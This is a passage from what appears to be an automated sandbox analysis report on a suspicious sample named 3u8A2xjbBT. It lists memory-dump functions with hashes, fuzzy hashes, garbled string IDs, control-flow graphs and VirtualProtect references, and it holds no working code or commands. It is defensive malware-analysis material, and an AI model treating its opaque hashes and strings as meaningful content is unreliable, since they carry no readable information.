                                      • Instruction Fuzzy Hash: D5516BB4D1921ADFCB44CFA4D880ADEBBB2FF89310F109566D40AAB314D7309986CF54
                                      Function 0B6B06AD Relevance: .1, Instructions: 148COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 180bfad790ac4b1c9ab6fbe2c744c50932c27fb6deaf3a6c3c2371ef0db74f20
                                      • Instruction ID: 9cc7b1a3257f16bcec01c73712d5dd730ba35dcb5fcf874ea33172587323c766
                                      • Opcode Fuzzy Hash: 180bfad790ac4b1c9ab6fbe2c744c50932c27fb6deaf3a6c3c2371ef0db74f20
                                      • Instruction Fuzzy Hash: E2514DB4E14229CFDB14CF64D880B9EBBB2FF89310F1095AAD50EA7355D7309A828F55
                                      Function 0166D010 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e019e031a404596be9ac8ef9c5d00e247cdce4f71520a24ed68fac989b306175
                                      • Instruction ID: 42683fdfdbeafe77b9a9e7af78e12a7b040e879b1cd2d41582fd30b5a33a5bf1
                                      • Opcode Fuzzy Hash: e019e031a404596be9ac8ef9c5d00e247cdce4f71520a24ed68fac989b306175
                                      • Instruction Fuzzy Hash: 5C510474E01218CBDB58DFA9CC44AAEBBF6FB89301F10856AD849AB358DB349D45CF14
                                      Function 0B6B2D49 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 840beff1eb348638b8cfacd061c9b8d937a0611ac5aec29fbda93015064995f8
                                      • Instruction ID: 9ac00055eeba94b2f0ecf0c8c7c70d03abe4210e0594207ec64512689456f9a1
                                      • Opcode Fuzzy Hash: 840beff1eb348638b8cfacd061c9b8d937a0611ac5aec29fbda93015064995f8
                                      • Instruction Fuzzy Hash: A1412AB5E1220A9FCB44CFA5D5546EEFBF2EF88300F10942AD525B7354E7344A468F90
                                      Function 0B6B2D58 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c335801e8cfaaa5b14a9f74f1bc43e7e4634bf95f29bdfac4bbc66fc9fce06eb
                                      • Instruction ID: f10fc33a3a0d0cfd87df68adb020743f69d6750979741b384aa9930081f9dc9d
                                      • Opcode Fuzzy Hash: c335801e8cfaaa5b14a9f74f1bc43e7e4634bf95f29bdfac4bbc66fc9fce06eb
                                      • Instruction Fuzzy Hash: 8B4139B4D1220ADBCB04CFA6D554AEEFBF2EF89300F10942AD525B7354E7345A868F90
                                      Function 0BBEED9D Relevance: .1, Instructions: 79COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cd4c78d93bf0e4f483f90b681e14e35df122e41a67b4412c59d8ddf6c018483f
                                      • Instruction ID: 0a9a03f0d4603e128e8d73a86727dfa6d5c3079116810ee7a431b5dcd28a10f8
                                      • Opcode Fuzzy Hash: cd4c78d93bf0e4f483f90b681e14e35df122e41a67b4412c59d8ddf6c018483f
                                      • Instruction Fuzzy Hash: 9C311870E111198BDB54CFADC98069DFBF2FF88600F14D4AAD12AEB264EB30DA458F14
                                      Function 0166360A Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dc11a9edcd29367c78f6b8a575b29579c67e4b9f4951c9ce08d35ccbe4355afa
                                      • Instruction ID: 7b25fe620435df6ebad4d883945b9d932a241c623a39ac32bb72680767d829ae
                                      • Opcode Fuzzy Hash: dc11a9edcd29367c78f6b8a575b29579c67e4b9f4951c9ce08d35ccbe4355afa
                                      • Instruction Fuzzy Hash: 68310771E006188BDB18CFAAD8443DEBBF6AFC9311F14C16AD419AA258DB750946CF90
                                      Function 0BBE7C50 Relevance: 4.0, Strings: 3, Instructions: 254COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (q$(q$4'q
                                      • API String ID: 0-1557261691
                                      • Opcode ID: 55d7e846447b2987233e5973653f228f63553e6151ef59d8f6fde6bfe07c8837
                                      • Instruction ID: 2db521de23fed5c8be4c974f687090d43eff631153c302bed8578ce87169c223
                                      • Opcode Fuzzy Hash: 55d7e846447b2987233e5973653f228f63553e6151ef59d8f6fde6bfe07c8837
                                      • Instruction Fuzzy Hash: 5181A071B002159FDB14DB79E850AAEBBF6FFC8210B148569D409EB350DF34AD068BA1
                                      Function 0BBE3E68 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 69 bbe3e68-bbe3e89 71 bbe3e8b-bbe3eb4 69->71 72 bbe3eb5-bbe3ec4 69->72 75 bbe3ec6-bbe3ef1 72->75 76 bbe3ef2-bbe3eff 72->76 80 bbe3f73-bbe3f76 76->80 81 bbe3f01-bbe3f1d 76->81 85 bbe3f7e-bbe3fad 80->85 89 bbe3f1f-bbe3f2e 81->89 90 bbe3f30-bbe3f35 81->90 89->90 96 bbe3f37-bbe3f42 89->96 91 bbe3f44-bbe3f72 90->91 96->91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$@bq$@bq
                                      • API String ID: 0-1752279952
                                      • Opcode ID: 033c4eaa97c358cc18db0ed28898ac057eb545f8b455ce88e98dbcda5a5331cc
                                      • Instruction ID: b80ce9ffe13efc98202b90014ef5100b282ee711e4f80a463beafe942a5f4bc6
                                      • Opcode Fuzzy Hash: 033c4eaa97c358cc18db0ed28898ac057eb545f8b455ce88e98dbcda5a5331cc
                                      • Instruction Fuzzy Hash: 1741B375E002069FCB14EFA4E4445ECB7F2FFC8251B1545A5C919AB360DB709E05CBE1
                                      Function 0BBE5DB8 Relevance: 2.7, Strings: 2, Instructions: 200COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 346 bbe5db8-bbe5e1c call bbe51c0 355 bbe5e1e-bbe5e27 346->355 356 bbe5e4c-bbe5e88 call bbe5cd0 346->356 357 bbe5efd-bbe5f28 355->357 358 bbe5e2d-bbe5e31 355->358 391 bbe5e8a-bbe5ebc 356->391 392 bbe5ec3-bbe5efc 356->392 365 bbe5f2e-bbe5f3f 357->365 366 bbe5fe2-bbe5fe5 357->366 361 bbe5e39-bbe5e3b 358->361 363 bbe5e3d-bbe5e3f 361->363 364 bbe5e46-bbe5e4a 361->364 363->364 364->355 364->356 378 bbe5f67-bbe5f75 365->378 379 bbe5f41-bbe5f62 365->379 368 bbe5ff6-bbe5ffc 366->368 369 bbe5fe7-bbe5fea 366->369 370 bbe5ffe-bbe6001 368->370 371 bbe6011-bbe603a 368->371 373 bbe5fec-bbe5ff2 369->373 374 bbe600d-bbe600f 369->374 370->371 376 bbe6003-bbe6009 370->376 377 bbe603e-bbe6041 371->377 373->371 380 bbe5ff4 373->380 374->377 376->371 383 bbe600b 376->383 388 bbe5f77-bbe5f80 378->388 389 bbe5f85-bbe5f93 378->389 379->377 381 bbe603c 380->381 381->377 383->381 388->377 400 bbe5f95-bbe5f9e 389->400 401 bbe5fa3-bbe5fb1 389->401 391->392 400->377 406 bbe5fde-bbe5fe0 401->406 407 bbe5fb3-bbe5fdc 401->407 406->377 407->377
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Tt$Pqq
                                      • API String ID: 0-1614511813
                                      • Opcode ID: de4292b8a6ec4db436d02bc86c5fcd55aeeda97424bd0dd86f398bcc0bdeb587
                                      • Instruction ID: 94632b298400de318d0ef41541985a5eb5eed8bab4be20883d8258b246c642de
                                      • Opcode Fuzzy Hash: de4292b8a6ec4db436d02bc86c5fcd55aeeda97424bd0dd86f398bcc0bdeb587
                                      • Instruction Fuzzy Hash: 5161C530B002045FD72597389590A3E77D7FFE825172489AAD426CB7A5EF75EC0287E1
                                      Function 0166AFD8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 622 166afd8-166b096 VirtualProtect 624 166b09f-166b0e7 622->624 625 166b098-166b09e 622->625 625->624
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 0166B086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 848cb19c6aa8fe582d56862206035ac5c424cbb167d361c57f95aa2c2c1a0c92
                                      • Instruction ID: a26e4a1d8c156ab7bc4cf416a2ce086c13fe4e8ac8d0f1530300b9eee2cb14a3
                                      • Opcode Fuzzy Hash: 848cb19c6aa8fe582d56862206035ac5c424cbb167d361c57f95aa2c2c1a0c92
                                      • Instruction Fuzzy Hash: B24178B9D00258DFCB10CFA9D984AEEFBB5BB49310F10942AE814B7250D775A946CF64
                                      Function 0166AFE0 Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 629 166afe0-166b096 VirtualProtect 631 166b09f-166b0e7 629->631 632 166b098-166b09e 629->632 632->631
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 0166B086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3709972638.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1660000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 83b7ad01d3229be815828d94431a7fc0527d65d4d8d77adaeec7c6817a79301a
                                      • Instruction ID: fc43cf093c443a9a1bf283245c01ad86c7a17ee2544d86c8fa7fab31668e8a59
                                      • Opcode Fuzzy Hash: 83b7ad01d3229be815828d94431a7fc0527d65d4d8d77adaeec7c6817a79301a
                                      • Instruction Fuzzy Hash: E33167B9D04258DFCB10CFAAD984ADEFBB5BB09310F14902AE814B7350D775A946CF64
                                      Function 0BBE49D8 Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 636 bbe49d8-bbe4a4f 645 bbe4adc-bbe4b55 636->645 646 bbe4a55-bbe4aa1 636->646 663 bbe4b5b-bbe4c7e 645->663 664 bbe4c80-bbe4ceb 645->664 722 bbe4aa3 call bbe4e98 646->722 723 bbe4aa3 call bbe4e88 646->723 660 bbe4aa9-bbe4ad5 660->645 681 bbe4cf2-bbe4d61 663->681 664->681 724 bbe4d63 call bbe5daa 681->724 725 bbe4d63 call bbe5db8 681->725 705 bbe4d69-bbe4dc0 716 bbe4de5-bbe4df5 705->716 717 bbe4dc2 705->717 718 bbe4dc5-bbe4dd0 717->718 720 bbe4ddc-bbe4de3 718->720 721 bbe4dd2-bbe4dd5 718->721 720->716 720->718 721->720 722->660 723->660 724->705 725->705
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Pqq
                                      • API String ID: 0-1334384951
                                      • Opcode ID: 6c53a06a243f0b096785142d494fe87dbc82526e16a0405934f20377f1f2b865
                                      • Instruction ID: 76ee3ca2568e7ce74e7421b2b72060ed06c6fa6daf4bddb3ce2860437529db62
                                      • Opcode Fuzzy Hash: 6c53a06a243f0b096785142d494fe87dbc82526e16a0405934f20377f1f2b865
                                      • Instruction Fuzzy Hash: ECC1C774B002089FCB58DF69D5986ADBBF2FF88611B248429D80ADB355EF34DD02CB95
                                      Function 0BBE49CA Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Pqq
                                      • API String ID: 0-1334384951
                                      • Opcode ID: a49f7b12b056993630303e4391977bb8f8c02b1c5a494d52c84502ad40548755
                                      • Instruction ID: e4c11f62969c35e8acfd4cff0907ebf6811e5e5da867458df5a1f0165536e463
                                      • Opcode Fuzzy Hash: a49f7b12b056993630303e4391977bb8f8c02b1c5a494d52c84502ad40548755
                                      • Instruction Fuzzy Hash: EFB1E834B002049FDB58DF69D5986ADBBF2FF88611B248429D80ADB395EF34DD02CB95
                                      Function 0BBE70B0 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Hq
                                      • API String ID: 0-1594803414
                                      • Opcode ID: 2c8fb5e56b780a4f95944ed9ab2e51deb71921b3c07cd2287c73f239026b1d4c
                                      • Instruction ID: 0861ec31748d8b01d881ea23c506fba57b44a05821459f4a670511c100ab2637
                                      • Opcode Fuzzy Hash: 2c8fb5e56b780a4f95944ed9ab2e51deb71921b3c07cd2287c73f239026b1d4c
                                      • Instruction Fuzzy Hash: 5571D436640500AFDB0A8F99D944D657BB7FF9D324B0A80D4F6198B232CB32DC62EB51
                                      Function 0BBE65F8 Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pq
                                      • API String ID: 0-153521182
                                      • Opcode ID: 35860ecedfaf64d2e681d0dbac258485212dd6797f6165bd91b49ab36498b654
                                      • Instruction ID: 32b92ad9a771c9527887ff413a1d72fa06994a2269de611c6c3cb6e975fb11f2
                                      • Opcode Fuzzy Hash: 35860ecedfaf64d2e681d0dbac258485212dd6797f6165bd91b49ab36498b654
                                      • Instruction Fuzzy Hash: DE819276640110AFDB4A9F98D944D257FA6FF8C32471A84D8F20A8F272C732DC61EB91
                                      Function 0BBE65E8 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: pq
                                      • API String ID: 0-153521182
                                      • Opcode ID: ee7ca85db8c3bbbad15345aed1cd819429265987bbf0059d4f9e846cc11336ac
                                      • Instruction ID: 3878e6a6ee9de6522daa7581239a84d375031e40b3866f0bc4c09c38d2d0cb0c
                                      • Opcode Fuzzy Hash: ee7ca85db8c3bbbad15345aed1cd819429265987bbf0059d4f9e846cc11336ac
                                      • Instruction Fuzzy Hash: E181B37A640100AFDB0A9F98D944D257FA6FF5C32471A84D8E20A8F272C732D861EB91
                                      Function 0BBEF826 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: P=q
                                      • API String ID: 0-3726114486
                                      • Opcode ID: 1ad5de1eb9d29741d4a2c01fd66cc788f23f65c29ccd23a09a0e205073c6403a
                                      • Instruction ID: 181f315abef03f4c6186a72708e0a445c6f42f4ab0798f029f658e16f05cf34c
                                      • Opcode Fuzzy Hash: 1ad5de1eb9d29741d4a2c01fd66cc788f23f65c29ccd23a09a0e205073c6403a
                                      • Instruction Fuzzy Hash: FA61F475D0839A9FDB02DB68D8905ED7FB1EF56260F0482E7C094EB2A2D7349906C761
                                      Function 0BBE30F0 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (q
                                      • API String ID: 0-2414175341
                                      • Opcode ID: bf8c5a5429019323cf0611b6d3a4e07205569cc4d26767c631027c3bd7877931
                                      • Instruction ID: 09f32ef30b8e679065278165a71db2e2a2aa80ef1e576f0071ec0e20455f81c2
                                      • Opcode Fuzzy Hash: bf8c5a5429019323cf0611b6d3a4e07205569cc4d26767c631027c3bd7877931
                                      • Instruction Fuzzy Hash: 6441E3317042059FCB16DF68E8908AABBF5FF8A21071481BAE515CB361CB34EC15CBA5
                                      Function 0BBE5DAA Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Tt
                                      • API String ID: 0-3315984107
                                      • Opcode ID: 608ec55060a971c9e2877ffb0020beb31ef025b0b63acd785dce38ce0140bda4
                                      • Instruction ID: 9cac1fe273b7f1e30ce2abe0a93cba0a2e985a4f5c7ba92e8b7f2622f41dd054
                                      • Opcode Fuzzy Hash: 608ec55060a971c9e2877ffb0020beb31ef025b0b63acd785dce38ce0140bda4
                                      • Instruction Fuzzy Hash: 1B318034B002059FC729DB78D6A0A3E77D3FFD8610B245868D40A8B394EF74ED0287A1
                                      Function 0BBE6572 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: 6442aabcaa7a44c887095f920b308eb06c6d83960cfdf1341bacc8003ff24d48
                                      • Instruction ID: 1b39d9db24f4c1dcb13e68b48c1b424d3f0eed04f0e295ccbb5b068db7bc78d9
                                      • Opcode Fuzzy Hash: 6442aabcaa7a44c887095f920b308eb06c6d83960cfdf1341bacc8003ff24d48
                                      • Instruction Fuzzy Hash: D3F03070E04206EFCB04EF64E4556AD7FB5FFA4315F218268D0059B255DAB15E15CB81
                                      Function 0BBE6580 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: d37602c521eb0e8f580b88b1b6771fe116870b50fec5302f8a2727002ebf93ee
                                      • Instruction ID: 465426db3c2aa81800c9b9b9d16e1e79de27c2aba6ec692a0bc0a1c6bb81619b
                                      • Opcode Fuzzy Hash: d37602c521eb0e8f580b88b1b6771fe116870b50fec5302f8a2727002ebf93ee
                                      • Instruction Fuzzy Hash: D8F01C30E0420AEFCB44EFA4E44569D7FF9FF54315F208268D409DB216EAB16E159BD1
                                      Function 0BBE1E28 Relevance: .4, Instructions: 375COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 564d517b2a231225b804b4fc44c8e9e97cc7ddad30a6ab66c7c99d95dd6ecc63
                                      • Instruction ID: a0c9dd987cd768d70a5049ab76c068419bd303ff2094be10ce7162d17fdc7b36
                                      • Opcode Fuzzy Hash: 564d517b2a231225b804b4fc44c8e9e97cc7ddad30a6ab66c7c99d95dd6ecc63
                                      • Instruction Fuzzy Hash: 45022930A00319CFDB65DF64D844BA9BBB6FF88310F1082D9E519AB261DB749E85CF91
                                      Function 0BBED567 Relevance: .4, Instructions: 371COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3fe047ea2623723b45401cee2b392001f4ff8392544b02cafee9d5f3bca2739
                                      • Instruction ID: 1e19ce9163ae5064efe47c9795d83fbb9ddcb24f3bbdb35a66d63f95c89dab34
                                      • Opcode Fuzzy Hash: c3fe047ea2623723b45401cee2b392001f4ff8392544b02cafee9d5f3bca2739
                                      • Instruction Fuzzy Hash: 6BF1E574D04229CFDB24DFA8C881BDDBBB1BF49300F1095A9D419B72A0EB749A85CF55
                                      Function 0BBEC1DC Relevance: .3, Instructions: 342COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98f034d5ff44c5e12fe84770289ab243c8324344ed73d1cb9a07500cf4bf46f6
                                      • Instruction ID: db2140f5270276e1eabec3db6464db0de2cacacbcbcaf75c241dd9f7d85b1fdb
                                      • Opcode Fuzzy Hash: 98f034d5ff44c5e12fe84770289ab243c8324344ed73d1cb9a07500cf4bf46f6
                                      • Instruction Fuzzy Hash: 1FE1D470D00218CFEB64DFA8C885B9DBBB1FF49304F1095AAD419A72A0DB749985CF65
                                      Function 0BBED180 Relevance: .3, Instructions: 264COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e025f9d9e655a54a6f4fa668ee6a813448731bbfd128dcbb430bf29297ca1a5f
                                      • Instruction ID: ffb460bd017a0686bc7f1cce8029ddd7516656f7af8ca9d9ddd0da9cca16bc10
                                      • Opcode Fuzzy Hash: e025f9d9e655a54a6f4fa668ee6a813448731bbfd128dcbb430bf29297ca1a5f
                                      • Instruction Fuzzy Hash: 14B1C2B0E0031CDFDB24DFA9C881B9EBBB1BF49304F1085A9D419A7264EB749985CF55
                                      Function 0BBE2DA8 Relevance: .2, Instructions: 244COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 46e1dfc5bc0969cf989655df480c092eb10bcb000c314607e8f5cd790fd5d49b
                                      • Instruction ID: 212719a7518fa6a9ca4d3706bd4857423d1c2067294f3f769c048bf13a0812d4
                                      • Opcode Fuzzy Hash: 46e1dfc5bc0969cf989655df480c092eb10bcb000c314607e8f5cd790fd5d49b
                                      • Instruction Fuzzy Hash: A8814671A043499FCB15CF68D854AEEBBF6FF85310B04856BE816CB291DB34A845CBA1
                                      Function 0BBE8597 Relevance: .2, Instructions: 226COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 881aef5026137701319d842e121dc9ad85745d42537bd4aaf8894e2b28cd6900
                                      • Instruction ID: aa94c902751ab1d7e58b6d677e329f6c7e842bbd4dc273367a8b947f6bed8e6c
                                      • Opcode Fuzzy Hash: 881aef5026137701319d842e121dc9ad85745d42537bd4aaf8894e2b28cd6900
                                      • Instruction Fuzzy Hash: 1EC14D78E05229CFDB64DFA4D984B9DBBB2BB49300F1085DAD819A7314D7306E81CF65
                                      Function 0BBE3B70 Relevance: .2, Instructions: 151COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
